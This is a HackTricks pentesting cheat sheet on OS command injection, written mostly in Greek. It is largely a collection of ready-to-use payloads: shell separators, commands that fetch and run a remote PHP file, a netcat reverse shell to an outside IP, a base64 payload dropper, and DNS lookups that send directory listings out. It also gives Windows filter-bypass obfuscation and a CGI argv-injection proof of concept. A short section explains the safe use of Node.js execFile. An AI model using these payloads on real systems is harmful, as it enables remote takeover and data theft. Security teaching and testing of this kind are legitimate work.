Command Injection

Reading time: 7 minutes

tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

Τι είναι command Injection?

Μια command injection επιτρέπει την εκτέλεση αυθαίρετων εντολών του λειτουργικού συστήματος από έναν επιτιθέμενο στον διακομιστή που φιλοξενεί μια εφαρμογή. Ως αποτέλεσμα, η εφαρμογή και όλα τα δεδομένα της μπορούν να παραβιαστούν πλήρως. Η εκτέλεση αυτών των εντολών συνήθως επιτρέπει στον επιτιθέμενο να αποκτήσει μη εξουσιοδοτημένη πρόσβαση ή έλεγχο στο περιβάλλον της εφαρμογής και στο υποκείμενο σύστημα.

Πλαίσιο

Ανάλογα με πού εισάγεται το input σας μπορεί να χρειαστεί να τερματίσετε το πλαίσιο που περικλείεται σε εισαγωγικά (χρησιμοποιώντας " ή ') πριν από τις εντολές.

Command Injection/Execution

bash
#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id #  Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)
ls%0abash%09-c%09"id"%0a   # (Combining new lines and tabs)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful

#Not executed but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command

Limition Bypasses

Αν προσπαθείτε να εκτελέσετε arbitrary commands inside a linux machine θα σας ενδιαφέρει να διαβάσετε για αυτές τις Bypasses:

Bypass Linux Restrictions

Παραδείγματα

vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay

Παράμετροι

Ακολουθούν οι κορυφαίες 25 παράμετροι που θα μπορούσαν να είναι ευάλωτες σε code injection και παρόμοιες RCE ευπάθειες (από link):

?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

Time based data exfiltration

Εξαγωγή δεδομένων: char by char

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real    0m5.007s
user    0m0.000s
sys 0m0.000s

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real    0m0.002s
user    0m0.000s
sys 0m0.000s

DNS based data exfiltration

Βασισμένο στο εργαλείο από https://github.com/HoLyVieR/dnsbin που επίσης φιλοξενείται στο dnsbin.zhack.ca

1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done

$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)

Διαδικτυακά εργαλεία για να ελέγξετε για DNS based data exfiltration:

  • dnsbin.zhack.ca
  • pingb.in

Filtering bypass

Windows

powershell C:**2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc

Linux

Bypass Linux Restrictions

Node.js child_process.exec vs execFile

Κατά τον έλεγχο εφαρμογών back-end σε JavaScript/TypeScript, συχνά θα συναντήσετε το Node.js child_process API.

javascript
// Vulnerable: user-controlled variables interpolated inside a template string
const { exec } = require('child_process');
exec(`/usr/bin/do-something --id_user ${id_user} --payload '${JSON.stringify(payload)}'`, (err, stdout) => {
/* … */
});

exec() δημιουργεί ένα shell (/bin/sh -c), επομένως οποιοσδήποτε χαρακτήρας που έχει ειδική σημασία για το shell (back-ticks, ;, &&, |, $(), …) θα οδηγήσει σε command injection όταν η είσοδος χρήστη συγκολληθεί στη συμβολοσειρά.

Αντιμετώπιση: χρησιμοποιήστε execFile()spawn() χωρίς την επιλογή shell) και παρέχετε κάθε όρισμα ως ξεχωριστό στοιχείο πίνακα ώστε να μην εμπλέκεται shell:

javascript
const { execFile } = require('child_process');
execFile('/usr/bin/do-something', [
'--id_user', id_user,
'--payload', JSON.stringify(payload)
]);

Real-world case: Synology Photos ≤ 1.7.0-0794 ήταν εκμεταλλεύσιμο μέσω ενός μη-επαληθευμένου WebSocket γεγονότος που τοποθετούσε δεδομένα ελεγχόμενα από attacker στο id_user τα οποία αργότερα ενσωματώθηκαν σε κλήση exec(), επιτυγχάνοντας RCE (Pwn2Own Ireland 2024).

Argument/Option injection via leading hyphen (argv, no shell metacharacters)

Not all injections require shell metacharacters. If the application passes untrusted strings as arguments to a system utility (even with execve/execFile and no shell), many programs will still parse any argument that begins with - or -- as an option. This lets an attacker flip modes, change output paths, or trigger dangerous behaviors without ever breaking into a shell.

Τυπικά σημεία όπου εμφανίζεται:

  • Ενσωματωμένα web UIs/CGI handlers που κατασκευάζουν εντολές όπως ping <user>, tcpdump -i <iface> -w <file>, curl <url>, κ.λπ.
  • Κεντρικοί CGI routers (π.χ., /cgi-bin/<something>.cgi με παράμετρο selector όπως topicurl=<handler>) όπου πολλαπλοί handlers επαναχρησιμοποιούν τον ίδιο αδύναμο validator.

Τι να δοκιμάσετε:

  • Δώστε τιμές που ξεκινούν με -/-- ώστε να καταναλωθούν ως flags από το downstream εργαλείο.
  • Καταχραστείτε flags που αλλάζουν τη συμπεριφορά ή γράφουν αρχεία, για παράδειγμα:
    • ping: -f/-c 100000 για να επιβαρύνετε τη συσκευή (DoS)
    • curl: -o /tmp/x για να γράψετε arbitrary paths, -K <url> για να φορτώσετε attacker-controlled config
    • tcpdump: -G 1 -W 1 -z /path/script.sh για να πετύχετε post-rotate execution σε unsafe wrappers
  • Αν το πρόγραμμα υποστηρίζει -- end-of-options, δοκιμάστε να παρακάμψετε naive mitigations που προσθέτουν -- στο λάθος σημείο.

Generic PoC shapes against centralized CGI dispatchers:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded

# Flip options in a downstream tool via argv injection
topicurl=<handler>&param=-n

# Unauthenticated RCE when a handler concatenates into a shell
topicurl=setEasyMeshAgentCfg&agentName=;id;

Λίστα Ανίχνευσης Brute-Force

https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt

Αναφορές

tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks